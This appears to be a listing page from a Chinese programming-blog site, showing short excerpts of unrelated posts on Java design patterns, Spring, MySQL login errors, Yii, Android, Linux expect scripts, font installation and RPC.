  • 读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是,在不破坏封装性的前提下,捕获一个对象的内部状态,并在对象之外保存这个状态,为以后的状态恢复作“备忘”
  • 《RAW格式照片处理专业技法》笔记 cherishLC PS
    注意,这不是教程!仅记录楼主之前不太了解的 一、色彩(空间)管理 作者建议采用ProRGB(色域最广),但camera raw中设为ProRGB,而PS中则在ProRGB的基础上,将gamma值设为了1.8(更符合人眼) 注意:bridge、camera raw怎么设置显示、输出的颜色都是正确的(会读取文件内的颜色配置文件),但用PS输出jpg文件时,必须先用Edit->conv
  • 使用 Git 下载 Spring 源码 编译 for Eclipse crabdave eclipse
    使用 Git 下载 Spring 源码 编译 for Eclipse   1、安装gradle,下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME,配置PATH  %GRADLE_HOME%/bin,cmd,gradle -v   2、spring4 用jdk8 下载 https://jdk8.java.
  • mysql连接拒绝问题 daizj mysql登录权限
    mysql中在其它机器连接mysql服务器时报错问题汇总 一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p   //带-p参数,在下一步进行密码输入 Enter password:    //无字符串输入 ERROR 1045 (28000): Access
  • Google Chrome 为何打压 H.264 dsjt applehtml5chromeGoogle
    Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准,Chrome 将在几个月后正式停止对 H.264 视频解码的支持,全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示,自从 WebM 视频编解码器推出以后,在性能、厂商支持以及独立性方面已经取得了很大的进步,为了与 Chromium 现有支持的編解码器保持一致,Chrome
  • yii 获取控制器名 和方法名 dcj3sjt126com yiiframework
    1. 获取控制器名 在控制器中获取控制器名:  $name = $this->getId(); 在视图中获取控制器名:    $name = Yii::app()->controller->id;    2. 获取动作名  在控制器beforeAction()回调函数中获取动作名:  $name =
  • Android知识总结(二) come_for_dream android
    明天要考试了,速速总结如下   1、Activity的启动模式        standard:每次调用Activity的时候都创建一个(可以有多个相同的实例,也允许多个相同Activity叠加。)        singleTop:可以有多个实例,但是不允许多个相同Activity叠加。即,如果Ac
  • 高洛峰收徒第二期:寻找未来的“技术大牛” ——折腾一年,奖励20万元 gcq511120594 工作项目管理
    高洛峰,兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖! 首期现在的进程刚刚过半,徒弟们真的很棒,人品都没的说,团结互助,学习刻苦,工作认真积极,灵活上进。我几乎会把他们全部留下来,现在已有一多半安排了实际的工作,并取得了很好的成绩。等他们出徒之日,凭他们的能力一定能够拿到高薪,而且我还承诺过一个徒弟,当他拿到大学毕
  • linux expect heipark expect
    1. 创建、编辑文件go.sh   #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact    2. 设置权限   chmod u+x go.sh  3.
  • Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • idea ubuntuxia 乱码 liyonghui160com
      1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个 字体文件。 2.在ubuntu 下可以执行下面操作安装该字体: sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
  • 改良程序的11技巧 pda158 技巧
    有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点,程序你只写一次,但以后会无数次的阅读。当你第二天回头来看你的代码 时,你就要开始阅读它了。当你把代码拿给其他人看时,他必须阅读你的代码。因此,在编写时多花一点时间,你会在阅读它时节省大量的时间。   让我们看一些基本的编程技巧:   尽量保持方法简短 永远永远不要把同一个变量用于多个不同的
  • 300个涵盖IT各方面的免费资源(下)——工作与学习篇 shoothao 创业免费资源学习课程远程工作
    工作与生产效率:   A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
  • 深入浅出RPC uule rpc
    深入浅出RPC-浅出篇 深入浅出RPC-深入篇   RPC Remote Procedure Call Protocol 远程过程调用协议   它是一种通过网络从远程计算机程序上请求服务,而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在,如TCP或UDP,为通信程序之间携带信息数据。在OSI网络通信模型中,RPC跨越了传输层和应用层。RPC使得开发
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他